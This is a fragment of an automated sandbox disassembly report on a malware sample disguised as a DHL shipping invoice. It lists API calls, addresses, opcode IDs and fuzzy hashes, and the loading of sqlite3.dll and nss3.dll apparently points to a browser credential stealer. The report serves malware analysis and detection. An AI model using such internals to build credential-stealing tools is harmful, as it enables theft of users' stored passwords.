                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                                      • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                                      • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                      • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                      • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                                      • String ID: A4@$Server Details
                                                                                                                                                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,7739E430,?,00000000), ref: 0040858F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,7739E430,?,00000000), ref: 004085BA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                                                                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`|u,00407A43,00000001,?,00000000,`|u,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                                      • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59